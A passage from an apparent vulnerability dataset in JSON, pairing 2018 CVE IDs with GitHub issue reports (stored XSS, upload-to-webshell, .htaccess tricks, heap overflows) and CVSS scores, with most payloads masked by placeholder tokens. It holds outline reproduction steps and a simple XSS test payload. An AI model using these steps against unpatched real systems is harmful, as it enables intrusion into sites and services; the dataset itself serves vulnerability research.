        "description": "There is a cross site scripting vulnerability . > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the email parameter post to the APITAG When the background administrator inquires about the personal information of this ordinary member, XSS triggers successfully. POC vulnerability trigger point FILETAG ERRORTAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10422",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/2",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/2",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2018-04-25T14:08:53Z",
        "description": "Stored XSS APITAG Privilege). Stored XSS found in content field when post a site news Steps To Reproduce: APITAG the backstage: URLTAG NUMBERTAG FILETAG APITAG content field to the following payload APITAG FILETAG NUMBERTAG On the site front page, we can see the news we just posted FILETAG The Same with following FILETAG Set content field to same payload, (a lot of aaa... is for discrimination) APITAG Go to: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10423",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/18",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/18",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-04-23T14:46:28Z",
        "description": "Information Disclosure APITAG Authentication). I found two information leakage vulnerabilities in APITAG you need to login the backstage first. The first one reveals the web root files on the web server: Steps to reproduce: APITAG in to the backstage URLTAG APITAG an article APITAG the page and see FILETAG APITAG url will direct to the following... FILETAG We can see all the files locate in web root the the server. The second reveals the real path of the APITAG files Steps to reproduce APITAG in to the backstage URLTAG APITAG an article APITAG to re edit this page, actually this page is save as iabl NUMBERTAG dat FILETAG we can see : FILETAG APITAG burp to intercept this request the original id is iabl NUMBERTAG and we change to hello iabl NUMBERTAG FILETAG APITAG hello iabl NUMBERTAG is not really exists, error occurs FILETAG This vulnerability reveals the full path of APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 2.7,
        "impactScore": 1.4,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-10429",
        "Issue_Url_old": "https://github.com/CosmoCMS/Cosmo/issues/405",
        "Issue_Url_new": "https://github.com/cosmocms/cosmo/issues/405",
        "Repo_new": "cosmocms/cosmo",
        "Issue_Created_At": "2018-04-26T05:24:47Z",
        "description": "There is a getshell vulnerability. Steps to Reproduce NUMBERTAG Go to FILETAG NUMBERTAG FILETAG APITAG Go to FILETAG Then the PHP code is executed FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10430",
        "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/57",
        "Issue_Url_new": "https://github.com/chekun/dilicms/issues/57",
        "Repo_new": "chekun/dilicms",
        "Issue_Created_At": "2018-04-26T05:29:11Z",
        "description": "Stored XSS Vulnerability Found in System setting > site setting. Steps to Reproduce APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the fourth textbo NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG APITAG and see the announcement we just posted FILETAG FILETAG And then Stored XSS triggered ...",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10469",
        "Issue_Url_old": "https://github.com/b3log/symphony/issues/620",
        "Issue_Url_new": "https://github.com/b3log/symphony/issues/620",
        "Repo_new": "b3log/symphony",
        "Issue_Created_At": "2018-04-27T02:16:33Z",
        "description": "Any File Upload. Hey man~I found a vulnerability: Can upload any file. My test environment symphony version : latest OS : Windows NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG AM Vulnerability details Location : /upload HTTP Request: FILETAG POST parameter named APITAG , I can change file name, e.g. APITAG . Uploaded file will not be parsed on this site APITAG , but others can. Attack I can upload jsp file directly to the website, and get webshell.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10527",
        "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/2",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/2",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2018-04-26T16:06:48Z",
        "description": "There is a Stored XSS with APITAG Stored XSS found when post an article Steps To Reproduce: APITAG the backstage: FILETAG APITAG post an article, you need to create an article classification, now we have class \"a\" FILETAG APITAG post a new article or edit an existing one FILETAG NUMBERTAG No NUMBERTAG is a simple test to check whether field is vulnerable to stored xss a)tilte filed FILETAG b)keyword field FILETAG Then go to the site front page : URLTAG c)abstract field FILETAG Then click the article to see more d)content filed FILETAG The Above four fields are prone to store xss attack",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10528",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/144",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/144",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2018-04-27T08:41:33Z",
        "description": "out of bound read in APITAG The GET_PROPERTY_TABLE in NUMBERTAG f_load_property_list function get a large name_offset and value_offset, the programe will crash in parse NUMBERTAG f funtion 's APITAG name) and APITAG value) when it access a unreadable address. CODETAG Please assign a CVE ID, thank you!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10536",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/32",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/32",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-04-23T00:04:40Z",
        "description": "APITAG crashes . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash4.wav wavpack y wavpack_crash4.wav Error message: ERRORTAG Valgrind says: CODETAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10536",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/31",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/31",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-04-22T23:56:28Z",
        "description": "APITAG crashes Heap buffer overwrite . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This FILETAG could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash2.wav wavpack y wavpack_crash2.wav Error message: ERRORTAG Valgrind says: CODETAG ASAN says: ERRORTAG Regards, Thuan",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10536",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/30",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/30",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-04-22T23:51:48Z",
        "description": "wavpack crashes many Heap buffer overwrites . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This has many heap buffer overwrites could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash1.wav wavpack y wavpack_crash1.wav Error message: ERRORTAG Valgrind says: ERRORTAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10538",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/33",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/33",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-04-23T00:08:47Z",
        "description": "APITAG crashes SEGFAULT Invalid write. Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash5.wav wavpack y wavpack_crash5.wav Error message: CODETAG Valgrind says ERRORTAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10570",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/9",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/9",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-04-28T10:55:25Z",
        "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability . I discovered a storage XSS vulnerability while auditing the code Vulnerability points appear in the FILETAG file FILETAG POST passed in FILETAG EXP is as follows: FILETAG The result of EXP is as follows: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10571",
        "Issue_Url_old": "https://github.com/openemr/openemr/issues/1518",
        "Issue_Url_new": "https://github.com/openemr/openemr/issues/1518",
        "Repo_new": "openemr/openemr",
        "Issue_Created_At": "2018-03-22T00:13:53Z",
        "description": "Security issues reported by outside group.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10574",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/335",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/335",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-04-25T04:29:16Z",
        "description": "Getshell via upload function. > Tested on NUMBERTAG Platform: Ubuntu + Apache2 prerequisite In the configuration of Apache, APITAG should be All for web directories so that htaccess in sub directories can take effect. However, it is very easy to satisfy because the URL rewrite function also needs it. Rationale Since APITAG needs to ensure the compatibility, it has to use blacklist to filter the extensions of uploaded files. However, while we cannot upload files ended with \"ph \", we can upload some files to change the rule of parsing. Actually, we can upload a APITAG to the server to make any files in the same directory executed as php files. Reproduction NUMBERTAG Preparation Prepare two files. One is a file named as haozhe or whatever you want. The other one is APITAG In haozhe : APITAG In APITAG : APITAG Upload Two files In the page of URLTAG , click Browse button to upload a file. Upload these two files. It works! APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10581",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4474",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4474",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-04-13T01:00:30Z",
        "description": "Tenant Variables view able/update able for Environments not scoped in the associated Team when logged in User is associated with Multiple APITAG Roles. Version: Tested and replicated in Octopus version APITAG Issue: The logged in user is able to PATHTAG variable values within the Tenant Variables area for Environments that do not exist within their associated Team scoping. This occurs in situations where the logged in Users also belongs to multiple teams where one of the Teams has the APITAG permission for APITAG permissions exist for the environment. Replication Steps NUMBERTAG Create a Test Project with APITAG FILETAG NUMBERTAG Connect the associated Project to a newly generated Tenants and select two environments (i.e. Testing & Production ); FILETAG NUMBERTAG Create a Project Template within the Project; FILETAG NUMBERTAG Create a Test Octopus User NUMBERTAG Create two Teams based on the Permissions information specified below and associate the newly created User with these Teams NUMBERTAG Login to Octopus as the newly created User NUMBERTAG Navigate to Tenants > Variables NUMBERTAG In this area it's possible to PATHTAG variables belonging to environments that are not specified within the Team that has the APITAG required containing the APITAG permission NUMBERTAG The expected behavior here would be still be able to view the variable but updating/saving should not be an option; FILETAG Permissions Information: User Roles: APITAG Role Test Editor_ FILETAG APITAG Role Test Reviewer_ FILETAG Teams: APITAG Test Editor_ FILETAG APITAG Test Reviewer_ FILETAG Test Permissions Export FILETAG Source: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.5,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10677",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/1",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/1",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2018-05-01T17:01:24Z",
        "description": "heap buffer overflow in APITAG ASAN Report: ERRORTAG Command: APITAG Test File: FILETAG Thanks",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10680",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/205",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/205",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2019-02-15T14:11:50Z",
        "description": "The List of fake or duplicated security vulnerabilities we declined to accept in NUMBERTAG Still active Duplicate CVETAG Author: MENTIONTAG Detail: CVETAG Duplicated with CVETAG . We fixed them after CVETAG confirmed. See: URLTAG CVETAG Author: MENTIONTAG Detail: CVETAG As same as CVETAG and CVETAG . We decline to accept it as a valid issue. If you get the admin privilege, we have so many self xss ways. Fake CVETAG Author: MENTIONTAG Detail: URLTAG It's fake. We have no dynamic including. No one can run PHP by uploading an image in current version. By the way, it needs authentication. Updated status CVETAG Author: MENTIONTAG Detail: URLTAG We declined to accept a self xss with admin privilege. CVETAG Author: MENTIONTAG Detail: URLTAG We declined to accept a self xss with admin privilege. CVETAG Author: MENTIONTAG Detail: URLTAG It's a joke. I laughed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10680",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/185",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/185",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2018-05-02T13:22:41Z",
        "description": "Z Blog php has a stored Cross Site Scripting Vulnerability. Z Blog php has a stored Cross Site Scripting Vulnerability I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a FILETAG Web site settings > Basic setting > Website title APITAG APITAG save it. exp POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: timezone NUMBERTAG username=admin; APITAG addinfotestzblogphp APITAG APITAG artshu NUMBERTAG APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG FILETAG APITAG APITAG Affected Version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10685",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/95",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/95",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2018-05-02T20:28:01Z",
        "description": "use after free in lzma_decompress_buf (src/stream.c). On latest version NUMBERTAG and master branch APITAG of lrzip, there is a heap use after free in lzma_decompress_buf function of (src/stream.c), which could be triggered by the POC below. The issue is similar to issue NUMBERTAG but happens in a different function. Triggering of this issue could be tricky: when running on a high performance server, most likely we fail to reproduce; however, when running lrzip on a desktop with all cpu cores busy, we could reproduce in some cases NUMBERTAG To reproduce this issue, run the command multiple times: PATHTAG t $POC The detailed backtrace is as follows NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG f2c2 bp NUMBERTAG fd0d3f NUMBERTAG c NUMBERTAG sp NUMBERTAG fd0d3f NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2c1 in lzma_decompress_buf PATHTAG NUMBERTAG f2c1 in ucompthread PATHTAG NUMBERTAG fd1cb1da6b9 in start_thread ( PATHTAG NUMBERTAG fd1ca9f NUMBERTAG c in clone ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10686",
        "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/1558",
        "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/1558",
        "Repo_new": "serghey-rodin/vesta",
        "Issue_Created_At": "2018-05-04T11:04:26Z",
        "description": "Vesta CP NUMBERTAG rXSS to\u00a0RCE. Hi, there is a reflected XSS on FILETAG line NUMBERTAG path. The issue can be used to upload a PHP file, hence gaining RCE. Despite during a \"normal\" file upload FILETAG calls _\"v copy fs file\"_ (line NUMBERTAG and URLTAG controls that the destination path is in /tmp or PATHTAG an attacker could upload an existing file, this way triggering APITAG (line NUMBERTAG and gaining the ability to write wherever PHP can.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10717",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/3",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/3",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2018-05-03T14:45:19Z",
        "description": "Security Issue: Buffer / Heap Overflow. MENTIONTAG APITAG There's an buffer overflow found in ngiflib.c in line NUMBERTAG Size of tocopy exceeded the pixels size and when copying into context >frbuff_p.p8 it overflow here. Proof of ASAN output: PATHTAG APITAG PATHTAG GIF NUMBERTAG a NUMBERTAG bits NUMBERTAG couleurs bg NUMBERTAG BLOCK SIGNATURE NUMBERTAG extension (id NUMBERTAG fe) Comment extension APITAG : Multi image GIF NUMBERTAG a created with APITAG Tools : APITAG BLOCK SIGNATURE NUMBERTAG extension (id NUMBERTAG f9) disposal_method NUMBERTAG delay_time NUMBERTAG APITAG BLOCK SIGNATURE NUMBERTAG C ',' img pos NUMBERTAG size NUMBERTAG palbits NUMBERTAG imgbits NUMBERTAG ncolors NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG Code clear (free NUMBERTAG npi NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fe NUMBERTAG at pc NUMBERTAG fc5dfe NUMBERTAG bp NUMBERTAG ffd NUMBERTAG sp NUMBERTAG ffd NUMBERTAG f NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fe NUMBERTAG thread T NUMBERTAG fc5dfe NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG bb4b in memcpy PATHTAG NUMBERTAG bb4b in APITAG PATHTAG NUMBERTAG bb4b in APITAG PATHTAG NUMBERTAG cc3 in APITAG PATHTAG NUMBERTAG ERRORTAG d5f in APITAG PATHTAG NUMBERTAG fa7 in main PATHTAG NUMBERTAG fc5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG fe NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fc5dfe NUMBERTAG in malloc ( PATHTAG NUMBERTAG b in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9f NUMBERTAG c NUMBERTAG fff9fa NUMBERTAG c NUMBERTAG fff9fb NUMBERTAG c NUMBERTAG fff9fc0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Affected code: static void APITAG ngiflib_img i, struct ngiflib_decode_context context, const u8 pixels, u NUMBERTAG n) { u NUMBERTAG tocopy; struct ngiflib_gif p = i >parent; while(n NUMBERTAG tocopy = (context APITAG < n) ? context APITAG : n; if(!i APITAG { ifndef NGIFLIB_INDEXED_ONLY if(p >mode & NGIFLIB_MODE_INDEXED) { endif / NGIFLIB_INDEXED_ONLY / ngiflib_memcpy(context >frbuff_p.p8, pixels, tocopy); // crash happened here pixels += tocopy;",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10726",
        "Issue_Url_old": "https://github.com/datenstrom/yellow/issues/321",
        "Issue_Url_new": "https://github.com/datenstrom/yellow/issues/321",
        "Repo_new": "datenstrom/yellow",
        "Issue_Created_At": "2018-05-04T08:56:42Z",
        "description": "There is a stored XSS vulnerability. A stored XSS vulnerability was found in Datenstrom Yellow NUMBERTAG When the users open the Edit page webpage, they can inject the XSS code to the system. POC: Inject the XSS payload: APITAG alert(\"xss\") APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10727",
        "Issue_Url_old": "https://github.com/Fabrik/fabrik/issues/2033",
        "Issue_Url_new": "https://github.com/fabrik/fabrik/issues/2033",
        "Repo_new": "fabrik/fabrik",
        "Issue_Created_At": "2018-05-04T10:50:54Z",
        "description": "Reflected Cross Site Scripting (XSS) vulnerability in fabrik_referrer. Issue description A reflected Cross Site Scripting (XSS) vulnerability in APITAG hidden input field in fabrik forms allows remote attackers to inject arbitrary scripts via the unsanitized HTTP Referrer header. Example Given a fabrik form URL, for example APITAG that contains an input field such as APITAG , it is possible to reproduce the vulnerability by changing the referrer, for example with APITAG . This may be possible via the following cURL command: APITAG Credits Danilo Cianciulli Paolo Di Notte : Koine Srl",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10753",
        "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/16",
        "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/16",
        "Repo_new": "lewdlime/abcm2ps",
        "Issue_Created_At": "2018-04-13T09:40:26Z",
        "description": "stack buffer overflow APITAG in delayed_output(float indent). URLTAG (gdb) set args POC (gdb) r abcm2ps NUMBERTAG File POC POC NUMBERTAG error: Bad character NUMBERTAG d\u00ff&e,d_d&dd\u00aaB NUMBERTAG POC NUMBERTAG error: Bad character NUMBERTAG d\u00ff&e,d_d&dd\u00aaB NUMBERTAG POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: Bad character 'k' POC NUMBERTAG error: Note too much dotted POC NUMBERTAG error: Bad character 'N' POC NUMBERTAG error: Bad character 'N' POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: No note in voice overlay POC NUMBERTAG error: Bad character 'K' POC NUMBERTAG error: Bad character 't' POC NUMBERTAG error: Wrong duration in voice overlay POC NUMBERTAG error: !slide! must be on a note or a rest POC NUMBERTAG warning: Line underfull NUMBERTAG pt of NUMBERTAG pt) Program received signal SIGSEGV, Segmentation fault. __GI_getenv (name NUMBERTAG ffff6a NUMBERTAG b8e \"BC_FATAL_STDERR_\", name APITAG \"LIBC_FATAL_STDERR_\") at APITAG NUMBERTAG getenv.c: No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG c NUMBERTAG d in __GI_getenv (name NUMBERTAG ffff6a NUMBERTAG b8e \"BC_FATAL_STDERR_\", name APITAG \"LIBC_FATAL_STDERR_\") at APITAG NUMBERTAG ffff NUMBERTAG c0f NUMBERTAG in __GI___libc_secure_getenv APITAG \"LIBC_FATAL_STDERR_\") at secure APITAG NUMBERTAG ffff NUMBERTAG fe NUMBERTAG a in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"stack smashing detected\") at APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG in __stack_chk_fail () at APITAG NUMBERTAG f NUMBERTAG in delayed_output (indent=<optimized out>) at APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10758",
        "Issue_Url_old": "https://github.com/datenstrom/yellow/issues/322",
        "Issue_Url_new": "https://github.com/datenstrom/yellow/issues/322",
        "Repo_new": "datenstrom/yellow",
        "Issue_Created_At": "2018-05-05T02:04:03Z",
